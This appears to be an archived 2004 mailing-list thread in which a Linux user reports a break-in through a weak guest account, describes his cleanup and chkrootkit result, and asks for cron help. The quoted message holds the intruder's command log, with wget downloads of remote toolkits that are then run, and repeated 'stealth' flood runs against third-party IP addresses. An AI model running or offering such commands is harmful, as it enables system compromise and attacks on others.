Re: [SLUG] Someone in my computer

From: Tevfik Yucek (yucek@eng.usf.edu)
Date: Wed Aug 25 2004 - 18:02:40 EDT


I would like to thank everybody that has send their very helpful
comments.

Yes, I was stupid enough to have an account "guest" (sorry, it was
not "user", it was "guest") with password "guest". In Turkish, we
have a presaid: "bir musibet bin nasihattan iyidir", which means one
bad experience is more effective (or better) then thousand advises.
Now, I got my lesson and will be *more* careful.

Here are the things that I did:

- removed the guest login (deleted the entry in /etc/passwd)
- changed my root password
- removed the .src directory in tmp
- run chkrookit

Unfortunatelly, I got the following in chkrookit:
        checking `bindshell'... INFECTED (PORTS: 3049)
which says I am rootkited.

I will re-install my computer this weekend :(.

I have a question: I want to run chkrootkit everyday. I put the
following line in my cron file:

cd /path/to/chkrootkit; ./chkrootkit 2>&1 | mail -s "chkrootkit output" myemail

it works fine, however, I dont want to get e-mails everyday. I want
to send the email only if the output of chkrootkit has the word
"INFECTED" in it. Can someone help me on this?

Thanks again for the great help.

Tevfik

On Tue, Aug 24, 2004 at 09:51:49AM -0400, Tevfik Yucek wrote:
>
> Hi all,
>
>
> Last night I realize there was someone in my computer, Slackware 10.
> I have a sshd running and he/she/it is connected to my computer and
> executed the following commands.
>
> I am usually not concerned with security and did not care about much
> until yesterday. I had a guest "user" account with password "guest"
> and he/she/it used it.
>
> So, here are my questions:
> - how he/she/it knows about my IP and how did the know I was
> using linux and how did he/she/it got the password? Just guessing?
> - how can I kick a user if I notice that I have and uninvited
> visitor. I had to stop the internet connection of my computer.
> - what does the command below do and should I do something about
> them ?
>
>
> Thanks,
> Tevfik
>
> Here are the commmands:
>
> passwd
> cat /etc/issue
> cd /tmp
> mdkri .src
> cd .src
> mkdir .src
> cd .src
> wget carmelo.go.ro/do.tgz
> tar zxvf do.tgz
> rm -rf do.tgz
> ./do
> ./do
> wget 0kas.com/prt.tgz
> tar zxvf prt.tgz
> ./x
> ./x
> ./x
> ./x
> ./x
> ./x
> wget stefang.com/prostii/n
> chmod +x n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ls
> ./n
> ./x
> ./x
> ./x
> wget yahaa.at/p/90
> ./90
> chmod +x 90
> ./90
> ./90
> wget 0kas.com/Florin/flood.tar.gz
> tar zxvf flood.tar.gz
> rm -rf flood.tar.gz
> ls
> rm -rf prt.tgz
> ls
> rm -rf prt.tgz
> cd belea
> ./stealth 218.38.3.83 53
> cd /tmp/.src/belea
> ./stealth 80.97.245.241 53
>
>
> ./stealth
> ^[[A
>
> w
> cd /tmp/.src
> cd belea
> ./steath 82.208.160.155 53
> ./steath 82.208.160.155 53
> ./steath 82.208.160.155 53
> ./stealth 82.208.160.155 53
> ./stealth 82.208.160.155 53
> export PATH="."
> bash
> cd /tmp/.src/belea
> w
> w
> cat psybnc.conf
> locate psybnc.conf
> ./stealth 213.154.149.199 53
> w
> ./stealth 213.233.97.53 53
> ./stealth 194.105.27.21 80
> ./stealth 81.196.147.218 53
> ./stealth 81.196.59.83 80
> ./stealth 81.196.59.83 53
> cd /tmp/.src
> cd belea
> ./stealth 80.96.146.171 53
> cd /tmp/ .scr/belea
> ./stealth 81.196.147.170 53
> ./stealth 81.196.147.170 55
> ./stealth 81.196.147.170 53
> ./stealth 211.47.141.43 53
> cd .src
> ce belea
> cd belea
> ./stealth 211.47.141.43
> ./stealth 211.47.141.43 53
> ./stealth 211.47.141.43 53
> w
> -----------------------------------------------------------------------
> This list is provided as an unmoderated internet service by Networked
> Knowledge Systems (NKS). Views and opinions expressed in messages
> posted are those of the author and do not necessarily reflect the
> official policy or position of NKS or any of its employees.
-----------------------------------------------------------------------
This list is provided as an unmoderated internet service by Networked
Knowledge Systems (NKS). Views and opinions expressed in messages
posted are those of the author and do not necessarily reflect the
official policy or position of NKS or any of its employees.



This archive was generated by hypermail 2.1.3 : Fri Aug 01 2014 - 15:24:19 EDT